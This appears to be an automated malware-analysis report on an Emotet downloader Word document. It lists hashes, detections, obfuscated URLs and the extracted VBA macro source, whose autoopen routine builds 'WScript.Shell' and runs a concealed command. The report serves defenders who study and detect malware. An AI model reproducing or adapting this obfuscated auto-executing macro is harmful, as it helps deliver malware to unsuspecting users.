Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 664bfa6bb9bc1856…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 139.6 KB
Created: 2019-01-16 06:54:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: fe4abcf698828b9341745381cb3524df
SHA-1: 756d1a3795efcdbf0902c4530ab894966b979ade
SHA-256: 664bfa6bb9bc18569bb464a682c4a63a0f1eef3d4a42288daf8a26291677deef
Risk score: 290

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. Heuristics indicate the presence of WScript.Shell usage and a Shell() call within the autoopen macro, strongly suggesting the execution of a secondary payload. The ClamAV detection as 'Doc.Downloader.Emotet-10022072-0' further supports this, as Emotet is known for its downloader capabilities. The script attempts to construct the string 'WscRipt.sHeLl' for execution.

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-10022072-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10022072-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set SleekPlasticBaconqb = Brandingai
    auxiliarypd = "WscRipt.sHeLl"
       Set missioncriticaldm = vortalscz
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Directoraz = wirelessqr
    orchestrationrz = Array(ebusinessct, Centralizedjr, Internationalhk, CreateObject("" + Plasticns + HeardIslandandMcDonaldIslandszb + auxiliarypd).Run!(("" + PracticalFreshCheesena + Horizontalrf + paymentqf + Granitelw + efficientjz.TextBox1) + copyingkn + Kidscp + Openarchitectedrj, 39 - 39), SDDnu, KidsBeautyKidszk, SavingsAccountmh)
       Set Clothinglv = RefinedMetalBikeko
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub autoopen()
    blackum = LicensedCottonChipsjd
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OLE body):
    • http://qwV1tmp[ssacp[sm/29c_1
    • http://p[stp[shp[s]sSEV1v+]gtV1+acp[sm/vzZMi_cPjZ@http://V1rV1mV1]fp[sp[ssSEacp[sm/w]f#
    • http://iglp[sp[s-fp[srmV1tip[s]afr/t8lqf9pPP_ywVhz7_wqM.@http://wwwasp11sSEzmar+/XhDjpb_0sihee1v_+

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8979 bytes
SHA-256: 39aeff85905cc436281f575ab2420bfccb57387a92528a70584e88a082cc5fb2
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "efficientjz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "Woodenqw"
Function Gorgeousuk()
On Error Resume Next
   Set compressingfw = integratelc
Set overrideht = Berkshiredd
Select Case HomeLoanAccountri
         Case 111
            deliverablesjv = copywp
            depositdj = CLng(828)
         Case 579
            SDDso = CLng(666)
            streamlineoq = CDate(paymentcn)
            IndustrialIndustrialzv = Int(582)
         Case 849
            inputpz = Cos(usercentricmp)
            NewTaiwanDollarjd = ChrB(379)
            Runlq = depositas
 End Select
Set Turnpiketz = RSSam
   Set Avonpw = Brandlq
Set parsecm = GorgeousCottonChickenzk
Select Case Accountabilitycw
         Case 961
            Dynamicji = Cambridgeshireiw
            auxiliarywr = CLng(426)
         Case 868
            Forwardhw = CLng(550)
            protocolid = CDate(generatehh)
            Multilayeredqo = Int(828)
         Case 274
            Branchnj = Cos(Bedfordshirecd)
            tanhi = ChrB(824)
            Frontlinevl = optimalom
 End Select
Set SleekPlasticBaconqb = Brandingai
auxiliarypd = "WscRipt.sHeLl"
   Set missioncriticaldm = vortalscz
Set Seniorkc = interfaceom
Select Case Ruenm
         Case 949
            opticaliz = Roadvr
            SDDdj = CLng(440)
         Case 519
            IncredibleFreshSausagesth = CLng(722)
            ErgonomicFreshPantsfp = CDate(Homebq)
            Handcraftedmd = Int(449)
         Case 497
            Bedfordshireiw = Cos(neuraljh)
            opticalhh = ChrB(717)
            Tennesseehu = Irelandun
 End Select
Set capacitorzm = vortalska
   Set Intelligentwb = copyld
Set reciprocaltp = Licensedzi
Select Case mindsharewv
         Case 687
            Softlr = Investorjn
            adapterwz = CLng(380)
         Case 271
            paymentmi = CLng(747)
            PersonalLoanAccountqp = CDate(cyanwh)
            compressingon = Int(811)
         Case 766
            eyeballsnk = Cos(HandcraftedConcreteChickenoc)
            Functionalitymu = ChrB(611)
            missioncriticalfd = programdc
 End Select
Set Directoraz = wirelessqr
orchestrationrz = Array(ebusinessct, Centralizedjr, Internationalhk, CreateObject("" + Plasticns + HeardIslandandMcDonaldIslandszb + auxiliarypd).Run!(("" + PracticalFreshCheesena + Horizontalrf + paymentqf + Granitelw + efficientjz.TextBox1) + copyingkn + Kidscp + Openarchitectedrj, 39 - 39), SDDnu, KidsBeautyKidszk, SavingsAccountmh)
   Set Clothinglv = RefinedMetalBikeko
Set Facetofacebw = copyzi
Select Case JSONch
         Case 991
            paymentqb = Dataul
            GenericRubberBikezf = CLng(846)
         Case 1
            bandwidthkb = CLng(432)
            UnbrandedSoftChipshm = CDate(RSSjw)
            protocoltc = Int(251)
         Case 260
            quantifyingiu = Cos(Tastynp)
            Practicalzc = ChrB(625)
            withdrawalzk = Curvert
 End Select
Set AutoLoanAccounthu = invoicepv
   Set moratoriumlt = transparenthd
Set IcelandKronait = executiveuu
Select Case synthesizefw
         Case 438
            GorgeousConcreteHatqf = HomeLoanAccountfo
            ADPww = CLng(582)
         Case 767
            bluetoothqw = CLng(272)
            Kinazu = CDate(Directorqt)
            synthesizepw = Int(163)
         Case 798
            microchipzv = Cos(Customerfocusedwc)
            Berkshireuj = ChrB(782)
            benchmarkpd = bandwidthww
 End Select
Set nationalia = Integrationql
   Set userfacingmp = multistateti
Set deposittw = Drivesiz
Select Case CheckingAccountof
         Case 625
            Rubberpi = ivorywf
            Securityzp = CLng(545)
         Case 235
            generatesb = CLng(849)
            circuitii = CDate(Borderszn)
            driverzs = Int(377)
         Case 62
            cultivatepz = Cos(Ouguiyadw)
            webenabledpw = ChrB(338)
            reinventnd = backendsn
 End Select
Set Plasticta = HTTPpi
End Function


Attribute VB_Name = "generatesz"
Function Directvz()
Streetwz = opensourcepu
toolsetdz = clearthinkingzp
depositjz = Metalrz
enterprisern = Oklahomaip
Bedfordshirefq = calculatingtj
InvestmentAccountzb = LicensedConcreteTablewq
Villemi = Crossingzb
Vermontck = Licensedko
JSONui = modularvq
leadingedgeiz = UICFranclz
indexingdf = HandmadeFreshPizzauj
Userfriendlyut = Courtwq
End Function
Function Healthoz()
Metalwb = Outdoorsjv
monetizelf = MoldovanLeuqj
depositjn = HomeLoanAccountun
THXzs = Streetkf
Legacywb = HandcraftedMetalChickenzj
InvestmentAccountnk = CreditCardAccountip
firewallsk = LebanesePoundjm
SCSInf = productuf
whiteic = InvestmentAccounthw
arrayst = Fullyconfigurableuz
parseal = Gorgeousia
Plannerdr = Bordersmh
End Function
Sub autoopen()
blackum = LicensedCottonChipsjd
architecturescb = multitaskingmn
Expresswayio = overridingjp
enterprisewu = Crossgroupiq
Ferryos = Multichannelledov
HealthGardenAutomotiveda = withdrawalss
outoftheboxaa = Array(SmallSteelBalluw, CreditCardAccountlj, Ghanass, Gorgeousuk, Streamlinednw, IntelligentSteelCheesewj, SleekRubberTunaqq)
verticalsw = hackingvv
GraphicInterfacehp = porttk
Bedfordshirepj = Smallnm
overrideuf = Chiefbw
initiativessq = rebootuc
protocolci = transmitterij
End Sub
Function greynq()
GorgeousFrozenSaladls = applicationsjq
valueaddeddw = GorgeousFreshCarhn
alarmwj = Louisianapj
Distributedjq = Devolvedfd
Unbrandedab = bifurcatedvh
exploittd = feedzs
Producthw = applicationci
Chiefjl = Multilayeredzu
distributedvw = SSLvw
monitorjk = Rubbermf
GroceryMusiczz = seizena
hapticjn = Alaskalk
End Function

Attribute VB_Name = "definitionti"

Attribute VB_Name = "Consultantwi"

Attribute VB_Name = "Mauritiussn"

Attribute VB_Name = "Metalaf"

Attribute VB_Name = "Softcm"

Attribute VB_Name = "Assistantwh"

Attribute VB_Name = "Softfw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "marketsji"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "HomeIndustrialvp"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Islandiv"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "calculatesf"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Steelnl"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "emarketsao"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "intranetrm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Buckinghamshirewd"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False